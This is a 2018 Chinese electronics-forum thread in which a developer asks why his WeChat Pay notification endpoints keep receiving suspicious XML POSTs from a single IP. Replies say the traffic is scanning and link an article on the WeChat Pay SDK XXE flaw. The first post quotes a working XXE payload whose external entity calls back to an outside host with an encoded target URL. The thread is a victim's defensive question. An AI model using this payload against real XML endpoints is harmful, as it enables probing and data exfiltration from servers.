搜索
bottom↓
回复: 3

微信支付确认接口,总是收到这样的post数据,是什么原因?

[复制链接]

出45入88汤圆

发表于 2018-11-12 08:33:37 | 显示全部楼层 |阅读模式
微信支付确认接口是架设在客户服务器上,用来接收来自微信服务器发来的通知,当有人支付成功后会通知客户服务器,支付成功了。是以post的方式来通信,格式是xml。但最近我两台服务器,两个不同的公司账户都收到类似的信息,这数据肯定不是微信发过来。来自的ip都是同一个。这是什么回事?
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2018111203_832?aHR0cHM6Ly93d3cubmV0aGlidXkuY24vZ3JvdXBidXkvbm90aWZ5">
%xxe;
]>

阿莫论坛20周年了!感谢大家的支持与爱护!!

月入3000的是反美的。收入3万是亲美的。收入30万是移民美国的。收入300万是取得绿卡后回国,教唆那些3000来反美的!

出0入0汤圆

发表于 2018-11-12 08:40:57 | 显示全部楼层
之前在阿里云也接收过一些不是我自己应用得消息
一个是阿里云自己扫描的,一个是国外IP发的http消息,查了下像是触发啥漏洞的

出0入0汤圆

发表于 2018-11-12 09:12:35 | 显示全部楼层
肯定对微信的消息要双向认证哈。

出45入88汤圆

 楼主| 发表于 2018-11-12 11:17:58 | 显示全部楼层
微信支付sdk被曝xxe漏洞,漏洞原理分析
https://my.oschina.net/passerman/blog/1840218
回帖提示: 反政府言论将被立即封锁ID 在按“提交”前,请自问一下:我这样表达会给举报吗,会给自己惹麻烦吗? 另外:尽量不要使用Mark、顶等没有意义的回复。不得大量使用大字体和彩色字。【本论坛不允许直接上传手机拍摄图片,浪费大家下载带宽和论坛服务器空间,请压缩后(图片小于1兆)才上传。压缩方法可以在微信里面发给自己(不要勾选“原图),然后下载,就能得到压缩后的图片】。另外,手机版只能上传图片,要上传附件需要切换到电脑版(不需要使用电脑,手机上切换到电脑版就行,页面底部)。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|Archiver|amobbs.com 阿莫电子技术论坛 ( 粤ICP备2022115958号, 版权所有:东莞阿莫电子贸易商行 创办于2004年 (公安交互式论坛备案:44190002001997 ) )

GMT+8, 2024-4-27 08:42

© Since 2004 www.amobbs.com, 原www.ourdev.cn, 原www.ouravr.com

快速回复 返回顶部 返回列表